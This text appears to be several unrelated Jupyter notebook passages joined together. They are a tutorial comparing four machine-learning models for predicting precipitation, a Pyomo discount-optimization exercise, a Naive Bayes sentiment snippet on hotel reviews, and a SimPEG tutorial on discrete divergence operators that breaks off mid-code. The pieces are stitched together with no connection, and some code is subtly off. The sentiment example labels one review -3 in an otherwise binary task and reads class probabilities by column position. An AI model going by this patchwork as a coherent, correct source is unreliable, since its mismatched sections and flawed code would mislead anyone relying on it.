plt.yticks([0.5, 1.5], ['Negatives','Positives'])
```
Another way we can evaluate the models is to compare precipitation likelihood given the same set of atmospheric conditions. First, let's choose an observation in the pre-scaled dataset for which it is raining, and then find the corresponding scaled observation:
```
def rand_atmos_conditions_precip(index='rand'):
"""
Function returns atmospheric conditions in a dataframe as well as the scaled
conditions in a numpy array so that they output a prediction in the model.
If no input is passed, the function will randomly generate an index to
choose from those observations in some training data with precipitation.
Otherwise, an integer index between 0 and 200 should be passed.
"""
# First, perform a test-train split
x_train, x_test, y_train, _ = define_holdout_data(x, y, verbose=False)
# perform feature scaling
_, x_train_scaled, _ = scale_data(x_train, x_test)
# this is what will go into the model to output a prediction
if index=='rand':
index = randint(0, len(y_train[y_train==1].index) - 1)
precipindex = y_train[y_train==1].index.values[index]
testpredictor = x_train_scaled.loc[precipindex]
return df.iloc[precipindex], testpredictor
```
## STEP 3: Train & Compare Machine Learning Models
Each section below goes through building and training a ML model. In each section, there are a few steps for each model "pipeline":
1. __Randomly perform a test-train split, feature scaling, and resample data to ensure outcomes are balanced__.
2. __Train your model__.
3. __Assess model metrics with testing and training data__. We begin by first assessing each model's performance by calculating the metrics defined above on the *testing* or *holdout* data; the key here is that the model has never seen this data. <br>__If applicable, tune your model.__ This means choosing new *hyperparameters*, retraining the model, and then reassessing the same model metrics to see if the model yields better results.
4. __Check for model overfitting__. We will also check to see if the model is overfitting by comparing metrics of the testing data to those of the training data. In short, the training data should not be outperforming the testing data.
5. __Actually make a prediction with a single observation__. Predicted precipitation probability provides a sanity test for us to make sure the model isn't way off base. It allows us to see for ourselves: given X meteorological conditions and our own understanding of meteorology, would rain seem likely? Is the model actually doing something realistic?
## Model 1: Logistic Regression
```
from sklearn.linear_model import LogisticRegression
## 1. Perform a test-train split, perform feature scaling, and then rebalance our dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=True)
## 2. Train the Logistic Regression model
# initialize the model
lr = LogisticRegression(solver='lbfgs')
# we choose this particular solver because we're not regularizing or penalizing certain features
# fit the model to scaled & balanced training data. Side note: this is where *Gradient Descent* occurs.
lr.fit(x_train_bal, y_train_bal);
## 3. Assess Logistic Regression's performance using testing data
##Now that we've "trained" our model, we make predictions using data that the
## model has never seen before (i.e., our holdout testing data) to see how it performs.
y_pred = lr.predict(x_test_bal)
# Call functions defined above to calculate metrics & plot a confusion matrix based on
# how well model simulates testing data
#plot_cm(y_test_bal, y_pred);
lr_acc, lr_rec = bin_metrics(y_test_bal, y_pred)
```
Accuracy tells us the percentage of correct predictions, whether precipitating or not. The Logistic Regression model, without any additional tuning, can correctly predict whether it's precipitating or not given a set of present atmospheric conditions around 84% of the time.
For this problem, False Positives (a false alarm) are less harmful than False Negatives (a missed rain event). Thus, along with accuracy, we should also try to maximize recall.
A very important aspect of tuning a machine learning model is ensuring that it isn't overfitting or underfitting:
An overfit model means the model is fit very well to the training data, but fails to generalize predictions outside the training dataset. A symptom of overfitting is that the models' training accuracy is much better than the testing accuracy. Overfitting can happen more easily in more complex models, like neural networks. To alleviate overfitting, one needs to reduce variance, through feature regularization, lowering model complexity, or performing k-folds cross-validation.
Before you dive too deeply into ML and in your own time, I suggest watching this (https://www.youtube.com/watch?v=EuBBz3bI-aA) 6-minute StatQuest YouTube video to develop more intuition for model error.
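The k-folds cross-validation mentioned above can be sketched with scikit-learn; here it is on synthetic stand-in data (in the notebook you would pass the scaled, balanced training arrays instead):

```python
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score

# synthetic stand-in data, purely for illustration
X_demo, y_demo = make_classification(n_samples=300, random_state=0)

# 5-fold cross-validation: five different train/validation splits, five accuracy scores
scores = cross_val_score(LogisticRegression(solver='lbfgs'), X_demo, y_demo, cv=5)
print(scores.mean())  # average accuracy across the folds
```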
```
##4. Check to see if the Logistic Regression model is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
# Compare testing data metrics to data training metrics.
print("Training metrics:")
pred_train= lr.predict(x_train_bal)
bin_metrics(y_train_bal,pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, y_pred);
## 5. Make a prediction with the Logistic Regression model
#First, we randomly choose some atmospheric conditions using the function defined above. This will be the atmospheric conditions we use for all models we build.
origvals, testpredictor = rand_atmos_conditions_precip()
#print(origvals) # observation from original dataframe
print(testpredictor) # scaled observation
# prediction output is in the format [probability no rain, probability rain]
lr_prediction = lr.predict_proba(np.array(testpredictor).reshape(1, -1))[0][1]*100
print("The meteorological conditions are: ")
print(origvals)
print(" ")
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(lr_prediction, digits=2))
```
## Model 2: Random Forest
To understand random forests, one must first understand a [decision tree](https://scikit-learn.org/stable/modules/tree.html#tree). A decision tree is intuitive: it is essentially a flowchart to point to an outcome based on "decisions" for each feature. A Random Forest is an ensemble of decision trees that are randomly constructed based on the features of the dataset and number of decisions. Trees are constructed by randomly choosing a feature to "seed" each tree, and then making rules or associations with other features to lead to the specified outcome.
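To build intuition for the trees themselves, here is a minimal single decision tree on made-up data (the feature names are hypothetical, chosen just for the printout):

```python
from sklearn.tree import DecisionTreeClassifier, export_text

# toy data: the label simply copies the first feature
X_toy = [[0, 0], [1, 1], [1, 0], [0, 1]]
y_toy = [0, 1, 1, 0]

tree = DecisionTreeClassifier(max_depth=1, random_state=0).fit(X_toy, y_toy)
print(export_text(tree, feature_names=['humidity', 'pressure']))  # the learned flowchart
print(tree.predict([[1, 0]]))  # follows the single 'humidity' decision
```

A random forest repeats this construction many times on random subsets of the data and features, then averages the trees' votes.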
```
from sklearn.ensemble import RandomForestClassifier
## 1. Perform a train-test split for cross-validation, perform feature scaling, and
## rebalance each testing & training dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=False)
##2. Train (and tuning) the Random Forest model
##Choosing hyperparameters: There are many hyperparameters one can decide upon when tuning the
## Random Forest classifier. The two we will adjust are: 1) The number of estimators or "trees" in the forest
## 2) The depth of the tree, or how many "decisions" are made until convergence is reached.
acc_scores = []
rec_scores = []
num_est = [10, 50, 500] # number of trees
depth = [2, 10, 100] # number of decisions
for i in num_est:
start = time.time()
print("Number of estimators is "+str(i))
for k in depth:
print("depth is "+str(k))
forest = RandomForestClassifier(n_estimators=i, max_depth=k)
forest.fit(x_train_bal, y_train_bal)
# cross validate & evaluate metrics based on testing data
pred_test= forest.predict(x_test_bal)
acc_val = metrics.accuracy_score(y_test_bal, pred_test)
acc_scores.append(acc_val)
rec_val = metrics.recall_score(y_test_bal, pred_test)
rec_scores.append(rec_val)
end = time.time()
print("Random Forest took "+str(end-start)+" seconds.")
### visualize the recall and accuracy scores for the different hyperparameter choices
plt.plot(acc_scores, marker='o', color='black',label='accuracy')
plt.plot(rec_scores, marker='o', color='blue',label='recall')
plt.xlabel('Hyperparameter Choice')
plt.ylabel('Score')
plt.legend()
print("Max Accuracy (black):", round(max(acc_scores), 4))
print("Max Recall (blue):", round(max(rec_scores), 4))
```
Which choice of hyperparameters should we pick? Choosing the right hyperparameters for this model requires revisiting which metrics are most important to our question. For this problem, we want to maximize both recall and accuracy.
Let's go with the parameters corresponding to x=0 (it looks good for both accuracy and recall!), but try other hyperparameters too if you have time.
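As an aside, scikit-learn can automate this kind of hyperparameter sweep with `GridSearchCV`; a sketch on synthetic stand-in data (in the notebook you would pass the balanced training arrays):

```python
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV

# synthetic stand-in data, purely for illustration
X_demo, y_demo = make_classification(n_samples=200, random_state=0)

# try every combination in the grid, scoring each with 3-fold cross-validation
grid = GridSearchCV(RandomForestClassifier(random_state=0),
                    param_grid={'n_estimators': [10, 50], 'max_depth': [2, 10]},
                    scoring='recall', cv=3)
grid.fit(X_demo, y_demo)
print(grid.best_params_)  # the combination with the best cross-validated recall
```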
```
forest = RandomForestClassifier(n_estimators=10, max_depth=2);
forest.fit(x_train_bal, y_train_bal);
## 3. Assess the Random Forest's performance using testing data
##Once again, we will use our testing data to make an initial evaluation of how the model is doing.
pred_test= forest.predict(x_test_bal)
# Call functions defined above to calculate metrics & plot a confusion matrix based on
# how well model simulates testing data
forest_acc, forest_rec = bin_metrics(y_test_bal, pred_test)
plot_cm(y_test_bal, pred_test)
## 4. Check to see if the Random Forest is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
# Compare testing data metrics to data training metrics.
print("Training metrics:")
rf_pred_train= forest.predict(x_train_bal)
bin_metrics(y_train_bal,rf_pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, pred_test);
```
WOW - the random forest model was not an improvement over the logistic regression model.
Random forests seldom overfit, but if they do, one should try increasing the number of trees, or decreasing the amount of data used to construct each tree. See scikit-learn's Random Forest Classifier webpage (https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html) for information on more hyperparameters one can tune to address overfitting.
```
##5. Make a prediction with the Random Forest
# prediction output is in the format [probability no rain, probability rain]
forest_prediction = forest.predict_proba(np.array(testpredictor).reshape(1, -1))[0][1]*100
print("The meteorological conditions are: ")
print(origvals)
print(" ")
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(forest_prediction, digits=2))
```
## Model 3: Support Vector Machines (SVMs)
SVMs divide observations into classes based on maximizing the distance between a "kernel" (basically a dividing function) and the elements of each feature/class/variable on a plane. Because the relationships between atmospheric variables and precipitation are inherently non-linear, we will choose a non-linear, "RBF" kernel.
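The RBF kernel itself is just a similarity measure that decays with squared distance, $K(x, x') = \exp(-\gamma\,\|x - x'\|^2)$; a minimal sketch (this helper is for illustration, not scikit-learn's implementation):

```python
import numpy as np

def rbf_kernel(x1, x2, gamma=1.0):
    """Gaussian (RBF) kernel: 1.0 for identical points, decaying toward 0 with distance."""
    diff = np.asarray(x1, dtype=float) - np.asarray(x2, dtype=float)
    return np.exp(-gamma * np.dot(diff, diff))

print(rbf_kernel([0.0, 0.0], [0.0, 0.0]))  # identical points -> 1.0
print(rbf_kernel([0.0, 0.0], [3.0, 4.0]))  # distant points -> nearly 0
```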
```
from sklearn import svm
## 1. Perform a test-train split, perform feature scaling, and the rebalance our dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=False)
```
Choosing hyperparameters
In the case of SVMs, we can tune "C", the regularization parameter. Regularization penalizes higher-order coefficients during training (i.e., Gradient Descent). Regularization is a way to reduce a model's complexity and address overfitting.
In SVMs, the lower the regularization parameter C, the higher the penalty. We are unsure what the C value should be. Thus, we train the model three times, each with a different value of C, to see what the best value should be. I highly suggest learning more about regularization if you choose to pursue ML methods on your own.
```
## 2. Train (and tune) the SVM (Note: this cell takes ~1 minute to run)
acc_scores = []
rec_scores = []
C_range = [0.01, 1, 100]
for i in C_range:
start = time.time()
print("C is... "+str(i))
svmclassifier = svm.SVC(C=i, kernel='rbf', gamma='scale', max_iter=20000, probability=True)
svmclassifier.fit(x_train_bal, y_train_bal)
# Save model metrics in order to choose best hyperparameter
pred_test= svmclassifier.predict(x_test_bal)
acc_val = metrics.accuracy_score(y_test_bal, pred_test)
acc_scores.append(acc_val)
rec_val = metrics.recall_score(y_test_bal, pred_test)
rec_scores.append(rec_val)
end = time.time()
print("Took "+str(end-start)+" seconds to train.")
plt.plot(C_range, acc_scores, marker='o', color='black',label='accuracy')
plt.plot(C_range, rec_scores, marker='o', color='blue',label='recall')
plt.xlabel('Hyperparameter Choice')
plt.xscale('log')
plt.ylabel('Score')
plt.legend()
print("Max Accuracy (black):", round(max(acc_scores), 4))
print("Max Recall (blue):", round(max(rec_scores), 4))
```
The SVM with C=1, i.e., a medium-weight penalty, results in a good balance between accuracy and recall.
We will train our final model with this hyperparameter.
```
# Define SVM classifier & fit to training data
svmclassifier = svm.SVC(C=1, kernel='rbf', gamma='scale', max_iter=20000, probability=True)
svmclassifier.fit(x_train_bal, y_train_bal);
## 3. Assess SVM performance using testing data
pred_test= svmclassifier.predict(x_test_bal)
# Call functions defined above to calculate metrics & plot a confusion matrix based on
# how well model simulates testing data
svm_acc, svm_rec = bin_metrics(y_test_bal, pred_test)
plot_cm(y_test_bal, pred_test)
```
WOW: using a non-linear Support Vector Machine instead of Logistic Regression increased both the recall and the accuracy.
```
## 4. Check to see if the SVM is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
# Compare testing data metrics to data training metrics.
print("Training metrics:")
svm_pred_train= svmclassifier.predict(x_train_bal)
bin_metrics(y_train_bal,svm_pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, pred_test);
```
One can address overfitting in an SVM by changing the kernel to a simpler kernel, or tuning the regularization parameter C.
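For instance, a linear kernel is the simplest choice; a sketch on synthetic stand-in data (variable names here are illustrative, not the notebook's):

```python
from sklearn import svm
from sklearn.datasets import make_classification

# synthetic stand-in data, purely for illustration
X_demo, y_demo = make_classification(n_samples=200, random_state=0)

# a linear kernel has far less capacity than 'rbf', so it is less prone to overfit
linear_svm = svm.SVC(C=1, kernel='linear', probability=True).fit(X_demo, y_demo)
print(linear_svm.score(X_demo, y_demo))  # training accuracy
```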
```
## 5. Make a prediction with the SVM
# prediction output is in the format [probability no rain, probability rain]
svm_prediction = svmclassifier.predict_proba(np.array(testpredictor).reshape(1, -1))[0][1]*100
print("The meteorological conditions are: ")
print(origvals)
print(" ")
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(svm_prediction, digits=2))
```
## Model 4: Neural Network
Note: there is a TON of information online about Neural Networks. Eleanor Recommends:
1) This three-part series of youtube videos (totaling about an hour in length) https://www.youtube.com/watch?v=aircAruvnKk.
2) machinelearningmastery.com In fact, the model below is based off of this blog post (https://machinelearningmastery.com/binary-classification-tutorial-with-the-keras-deep-learning-library/)
```
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
## 1. Perform a test-train split, perform feature scaling, and the rebalance our dataset.
x_train_bal, y_train_bal, x_test_bal, y_test_bal = dataprep_pipeline(x, y, verbose=False)
## 2. Train (and build and compile) the Neural Network
## There are lots of hyperparameters here. Please read the comments to guide you in playing with them later!
### Build a very simple Neural Network and Compile
number_inputs = len(x_train_bal.columns)
# create model
nn = Sequential()
nn.add(Dense(number_inputs, input_dim=number_inputs, activation='relu'))
# Try uncommenting this to address overfitting
# from keras.regularizers import l2
# reg = l2(0.001)
# nn.add(Dense(number_inputs, activation='relu',bias_regularizer=reg,activity_regularizer=reg))
# try commenting out one and then the other
nn.add(Dense(1, activation='sigmoid'))
#nn.add(Dense(1, activation='softmax'))
# Compile model
# Also try changing the learning rate.
learning_rate = 0.001 # only used in the SGD optimizer.
# Also try commenting out one & then the other.
nn.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
#nn.compile(loss='binary_crossentropy', optimizer=keras.optimizers.SGD(lr=learning_rate), metrics=['accuracy'])
### Actually training the model
batch_size = 24 # The number of samples the network sees before it backpropagates (batch size) # 24 & 32 yield accuracy = 87%
epochs = 100 # The number of times the network will loop through the entire dataset (epochs)
shuffle = True # Set whether to shuffle the training data so the model doesn't see it sequentially
verbose = 2 # Set whether the model will output information when trained (0 = no output; 2 = output accuracy every epoch)
# Train the neural network!
start = time.time()
history = nn.fit(x_train_bal, y_train_bal, validation_data=(x_test_bal, y_test_bal),
batch_size=batch_size, epochs=epochs, shuffle=shuffle, verbose=verbose)
end = time.time()
print("Neural Network took "+str(end-start)+" seconds to train.")
#Accuracy & loss with epochs
#Neural networks train in epochs. During each epoch, the model trains by sweeping over each layer,
#adjusting weights based on their resulting errors, through processes called forward propagation and backpropagation.
#By plotting the model accuracy & loss with each epoch, we can visualize how the model error evolves with training.
figure, axes = plt.subplots(nrows=2,ncols=1)
figure.tight_layout(pad=3.0)
# plot accuracy during training
plt.subplot(211)
plt.title('Accuracy')
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend();
# plot loss during training
plt.subplot(212)
plt.title('Loss')
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.xlabel("Epoch");
plt.legend()
plt.show();
##3. Assess Neural Network's performance using testing data
## Though the accuracy is pictured above, additionally quantify recall on testing data with the
## same functions used previously to remain consistent
pred_test= (nn.predict(x_test_bal)>0.5).astype("int32")
nn_acc, nn_rec = bin_metrics(y_test_bal, pred_test)
plot_cm(y_test_bal, pred_test)
## 4. Check to see if the Neural Network is overfitting (or underfitting)
#Remember:
#testing metrics > training metrics = underfitting, model is too simple
#testing metrics < training metrics = overfitting, model is too complex
#Note: Neural networks can easily overfit because they are complex and can fit to the training data extremely well,
# Overfitting prevents neural networks from generalizing to other data (like the testing data).
# Compare testing data metrics to data training metrics.
print("Training metrics:")
nn_pred_train= (nn.predict(x_train_bal)>0.5).astype("int32")
bin_metrics(y_train_bal,nn_pred_train);
# As a reminder, display testing metrics:
print(" ")
print("Testing metrics:")
bin_metrics(y_test_bal, pred_test);
## 5. Make a prediction with the Neural Network
# the single sigmoid output is the predicted probability of rain
nn_prediction = nn.predict(np.array(testpredictor).reshape(1, -1))[0][0]*100
print("The meteorological conditions are: ")
print(origvals)
print("There is a {0:.{digits}f}% chance of precipitation given those meteorological conditions.".format(nn_prediction, digits=2))
```
## SUMMARY: Compare all Four Machine Learning Models
```
model_metrics = pd.DataFrame({'Metrics':['Accuracy','Recall','Prediction example'],
'Logistic Regression':[lr_acc, lr_rec, lr_prediction],
'Random Forest':[forest_acc, forest_rec, forest_prediction],
'Support Vector Machine':[svm_acc, svm_rec, svm_prediction],
'Neural Network':[nn_acc, nn_rec, nn_prediction]})
model_metrics = model_metrics.set_index('Metrics')
model_metrics
```
## STEP 4: Assess Feature Importance
Note: Feature Importance is not possible with non-linear Support Vector Machines because the data is transformed by the kernel into another space that is unrelated to the input space.
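One model-agnostic alternative that does work for SVMs is permutation importance; a sketch on synthetic stand-in data (in the notebook you would pass `svmclassifier` with the balanced test arrays):

```python
from sklearn.datasets import make_classification
from sklearn.inspection import permutation_importance
from sklearn.svm import SVC

# synthetic stand-in data, purely for illustration
X_demo, y_demo = make_classification(n_samples=200, n_features=4,
                                     n_informative=2, random_state=0)
svc = SVC(kernel='rbf', gamma='scale').fit(X_demo, y_demo)

# shuffle one feature at a time and measure how much the score drops
result = permutation_importance(svc, X_demo, y_demo, n_repeats=10, random_state=0)
print(result.importances_mean)  # one importance value per feature
```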
```
## Feature importance in Logistic Regression Model
pd.DataFrame(abs(lr.coef_[0]),
index = x.columns,
columns=['importance']).sort_values('importance',ascending=False)
## Feature importance in Random Forest Model
pd.DataFrame(forest.feature_importances_,
index = x.columns,
columns=['importance']).sort_values('importance', ascending=False)
## Feature importance in Neural Network
cols = x.columns.values
nn_featimportance = []
for var in cols:
# create a vector corresponding to a 1 where the feature is located:
inputvector = np.array((cols==var).astype(int).reshape(1, -1))
nn_featimportance.append(nn.predict(inputvector)[0][0]*100)
pd.DataFrame( nn_featimportance,
index = x.columns,
columns=['importance']).sort_values('importance',ascending=False)
```
# Q-PART C-15
```
from pulp import *
import pyomo.environ as pe
import logging
logging.getLogger('pyomo.core').setLevel(logging.ERROR)
from pyomo.environ import *
from math import pi
import warnings
warnings.filterwarnings('ignore')
m = ConcreteModel()
m.a = pe.Set(initialize=[1, 2, 3, 4])
m.demand = pe.Var(m.a, bounds=(1e-20,2500))
m.disc= pe.Var(m.a, bounds=(.1,.6))
m.saleVal = pe.Var(m.a, bounds=(.6*606,606))
m.inventory = pe.Var(m.a, bounds=(1e-20,2500))
m.age = Param([1,2,3,4], initialize={1:96, 2:97, 3:98, 4:99})
def inv_rule(m, i):
if i ==1:
return 2476 >= m.inventory[i] - m.demand[i]
else:
return m.inventory[i-1] >= m.inventory[i] - m.demand[i]
m.c1 = pe.Constraint(m.a, rule=inv_rule)
def demand_rule(m, i):
if i==1:
return m.demand[i] <= ((4.41125 + 3.89091 * m.disc[i] - 0.18602 * (m.age[i]**.5-1)/.5
-3.19977 * .579
+ 0.56468 * (48**.2 -1)/.2+ 0.80126)*.2+1)**5
else:
return m.demand[i] <= ((4.41125 + 3.89091 * m.disc[i] - 0.18602 * (m.age[i]**.5-1)/.5
-3.19977 * m.disc[i-1]
+ 0.56468 * (m.demand[i-1]**.2 -1)/.2+ 0.80126)*.2+1)**5
m.c2 = pe.Constraint(m.a, rule=demand_rule)
def disc_rule(m, i):
if i ==1:
return m.disc[i] >= .1
else:
return m.disc[i] >= m.disc[i-1]
m.c3 = pe.Constraint(m.a, rule=disc_rule)
def d_i_rule(m, i):
if i ==1:
return m.demand[i] <= 2476
else:
return m.demand[i] <= m.inventory[i-1]
m.c4 = pe.Constraint(m.a, rule=d_i_rule)
def d_i_rule2(m):
return sum([m.demand[i] for i in [1,2,3,4]]) <= 2476
m.c5 = pe.Constraint(rule=d_i_rule2)
m.o = Objective(expr=
(sum([m.demand[i]*(1-m.disc[i])*606 for i in [1,2,3,4]])), sense=maximize)
solver = SolverFactory('ipopt')
status = solver.solve(m)
print("Status = %s" % status.solver.termination_condition)
for i in [1,2,3,4]:
print("%s = %f" % (m.demand, value(m.demand[i])))
for i in [1,2,3,4]:
print("%s = %f" % (m.disc, value(m.disc[i])))
#print("%s = %f" % (m.disc, value(m.y)))
print("Objective = %f" % value(m.o))
#.pprint()
```
##### Analysis
We have used non-linear optimization to derive the outcome.
- The discounts offered as per the plan:
- Week 1 - 10%
- Week 2 - 15%
- Week 3 - 31%
- Week 4 - 41%
- Units sold would be:
- Week 1 - 16
- Week 2 - 22
- Week 3 - 33
- Week 4 - 41
- Revenue from Sales: 48103, which is higher than the 41302 made in reality.
The store would have sold fewer units (112, compared to the 159 actually sold), but the revenue generated would have been close to 7000 more, and that is before counting the extra profit from selling the remaining units at approximately a 60% discount (roughly 11000). In total, the store would have made an extra 18000 or so by using the above optimization strategy.
# Q-3
```
# assumed imports for this cell (not shown in the original notebook)
import re
import pandas as pd
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords as nltk_stopwords
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import BernoulliNB
stopwords = nltk_stopwords.words('english')
data = ["Service was very good. Excellent breakfast in beautiful restaurant included in price. I was happy there and extended my stay for extra two days.",
"Really helpful staff, the room was clean, beds really comfortable. Great roof top restaurant with yummy food and very friendly staff.",
"Good location. The Cleanliness part was superb.",
"I stayed for two days in deluxe A/C room (Room no. 404). I think it is renovated recently. Staff behaviour, room cleanliness all are fine.",
"The room and public spaces were infested with mosquitoes. I killed a dozen or so in my room prior to sleeping but still woke up covered in bites.",
"Unfriendly staff with no care for guests.",
"Very worst and bad experience, Service I got from the hotel reception is too worst and typical.",
"Good location but the staff was unfriendly"
]
data = pd.DataFrame(data)
data.columns = ['text']
data['sentiment'] = [1,1,1,1,0,0,0,-3]
def clean_text(x):
splchars = re.compile(r'[^A-Za-z ]',re.IGNORECASE)
x = splchars.sub('', x)
x = word_tokenize(x.lower())
x = [w for w in x if w not in stopwords]
return(' '.join(x))
data.fillna('NA', inplace=True)
data['text_clean'] = data['text'].apply(lambda x: clean_text(x.lower()))
count_vec_v1 = CountVectorizer(stop_words=stopwords,
ngram_range=(1,2), max_features=5000)
count_vec_dict = count_vec_v1.fit(data.text_clean)
reviews_text_vec = count_vec_v1.transform(data.text_clean) # transform the cleaned text the vectorizer was fit on
df_reviews = pd.DataFrame(reviews_text_vec.toarray())
df_reviews.columns = count_vec_dict.get_feature_names()
print("Data with all possible 1,2 Grams.")
df_reviews.head()
columns = ['Beautiful', 'Good Service', 'Good Location', 'Superb', 'Cleanliness', 'Mosquitoes',
'Unfriendly', 'bad experience']
columns = [c.lower() for c in columns]
print("Phrases / Words to consider")
columns
df_reviews = df_reviews[list(set(columns).intersection(set(df_reviews.columns)))]
print("Train data")
df_reviews
y_train = data.sentiment[:-1]
X_train = df_reviews.iloc[:-1,]
X_test = pd.DataFrame(df_reviews.iloc[-1,:]).T
print("Test Data")
X_test
print("As we can see from above 'good service' is not available in the training set / test set and hence it will not be considered for model building")
print("building Naive Bayes Model..")
bayes_clf = BernoulliNB()
bayes_clf.fit(X_train, y_train)
pred = bayes_clf.predict_proba(X_test)
print("Probability of Negative Sentiment is : {}".format(pred[0, 0]))
print("Probability of Positive Sentiment is : {}".format(pred[0, 1]))
```
# Building our operators: the Face Divergence
The divergence is the integral of a flux through a closed surface as that enclosed volume shrinks to a point. Since we have discretized and no longer have continuous functions, we cannot fully take the limit to a point; instead, we approximate it around some (finite!) volume: *a cell*. The flux out of the surface ($\vec{j} \cdot \vec{n}$) is actually how we discretized $\vec{j}$ onto our mesh (i.e. $\bf{j}$) except that the face normal points out of the cell (rather than in the axes direction). After fixing the direction of the face normal (multiplying by $\pm 1$), we only need to calculate the face areas and cell volume to create the discrete divergence matrix.
<img src="./images/Divergence.png" width=80% align="center">
<h4 align="center">Figure 4. Geometrical definition of the divergence and the discretization.</h4>
## Implementation
Although this is a really helpful way to think conceptually about what is happening, implementing it directly would mean a huge for loop over each cell. In practice, this would be slow, so instead, we will take advantage of linear algebra. Let's start by looking at this in 1 dimension using the SimPEG Mesh class.
```
import numpy as np
from SimPEG import Mesh
import matplotlib.pyplot as plt
%matplotlib inline
plt.set_cmap(plt.get_cmap('viridis')) # use a nice colormap!
# define a 1D mesh
mesh1D = Mesh.TensorMesh([5]) # with 5 cells
fig, ax = plt.subplots(1,1, figsize=(12,2))
ax.plot(mesh1D.gridN, np.zeros(mesh1D.nN),'-k',marker='|',markeredgewidth=2, markersize=16)
ax.plot(mesh1D.gridCC,np.zeros(mesh1D.nC),'o')
ax.plot(mesh1D.gridFx,np.zeros(mesh1D.nFx),'>')
ax.set_title('1D Mesh')
# and define a vector of fluxes that live on the faces of the 1D mesh
face_vec = np.r_[0., 1., 2., 2., 1., 0.] # vector of fluxes that live on the faces of the mesh
print("The flux on the faces is {}".format(face_vec))
plt.plot(mesh1D.gridFx, face_vec, '-o')
plt.ylim([face_vec.min()-0.5, face_vec.max()+0.5])
plt.grid(which='both')
plt.title('face_vec');
```
Over a single cell, the divergence is
$$
\nabla \cdot \vec{j}(p) = \lim_{v \to \{p\}} \iint_{S(v)} \frac{\vec{j}\cdot \vec{n}}{v} \, dS
$$
in 1D, this collapses to taking a single difference - how much is going out of the cell vs coming in?
$$
\nabla \cdot \vec{j} \approx \frac{1}{v}(-j_{\text{left}} + j_{\text{right}})
$$
Since the normal of the x-face on the left side of the cell points in the positive x-direction, we multiply by -1 to get the flux going out of the cell. On the right, the normal defining the x-face points out of the cell, so it is positive.
```
# We can take the divergence over the entire mesh by looping over each cell
div_face_vec = np.zeros(mesh1D.nC) # allocate for each cell
for i in range(mesh1D.nC): # loop over each cell and
div_face_vec[i] = 1.0/mesh1D.vol[i] * (-face_vec[i] + face_vec[i+1])
print("The face div of the 1D flux is {}".format(div_face_vec))
```
Doing it as a for loop is easy to program for the first time,
but is difficult to see what is going on and could be slow!
Instead, we can build a faceDiv matrix (note: this is a silly way to do this!)
```
faceDiv = np.zeros([mesh1D.nC, mesh1D.nF]) # allocate space for a face div matrix
for i in range(mesh1D.nC): # loop over each cell
faceDiv[i, [i, i+1]] = 1.0/mesh1D.vol[i] * np.r_[-1,+1]
print("The 1D face div matrix for this mesh is \n{}".format(faceDiv))
assert np.all( faceDiv.dot(face_vec) == div_face_vec ) # make sure we get the same result!
print("\nThe face div of the 1D flux is still {}!".format(div_face_vec))
```
the above is still a loop... (and python is not a fan of loops).
Also, if the mesh gets big, we are storing a lot of unnecessary zeros
```
"There are {nnz} zeros (too many!) that we are storing".format(nnz = np.sum(faceDiv == 0))
```
### Working in Sparse
We will instead use *sparse* matrices. These are in scipy and act almost the same as numpy arrays (except they default to matrix multiplication), and they don't store all of those pesky zeros! We use [scipy.sparse](http://docs.scipy.org/doc/scipy/reference/sparse.html) to build these matrices.
```
import scipy.sparse as sp
from SimPEG.Utils import sdiag # we are often building sparse diagonal matrices, so we made a function in SimPEG!
# construct differencing matrix with diagonals -1, +1
sparse_diff = sp.spdiags((np.ones((mesh1D.nC+1, 1))*[-1, 1]).T, [0, 1], mesh1D.nC, mesh1D.nC+1, format="csr")
print("the sparse differencing matrix is \n{}".format(sparse_diff.todense()))
# account for the volume
faceDiv_sparse = sdiag(1./mesh1D.vol) * sparse_diff # account for volume
print("\n and the face divergence is \n{}".format(faceDiv_sparse.todense()))
print("\n but now we are only storing {nnz} nonzeros".format(nnz=faceDiv_sparse.nnz))
assert np.all(faceDiv_sparse.dot(face_vec) == div_face_vec)
print("\n and we get the same answer! {}".format(faceDiv_sparse * face_vec))
```
In SimPEG, this is stored as the `faceDiv` property on the mesh
```
print(mesh1D.faceDiv * face_vec) # and still gives us the same answer!
```
## Moving to 2D
To move up in dimensionality, we build a 2D mesh which has both x and y faces
```
mesh2D = Mesh.TensorMesh([100,80])
mesh2D.plotGrid()
plt.axis('tight');
```
We define 2 face functions, one in the x-direction and one in the y-direction. Here, we choose to work with sine functions as the continuous divergence is easy to compute, meaning we can test it!
```
jx_fct = lambda x, y: -np.sin(2.*np.pi*x)
jy_fct = lambda x, y: -np.sin(2.*np.pi*y)
jx_vec = jx_fct(mesh2D.gridFx[:,0], mesh2D.gridFx[:,1])
jy_vec = jy_fct(mesh2D.gridFy[:,0], mesh2D.gridFy[:,1])
j_vec = np.r_[jx_vec, jy_vec]
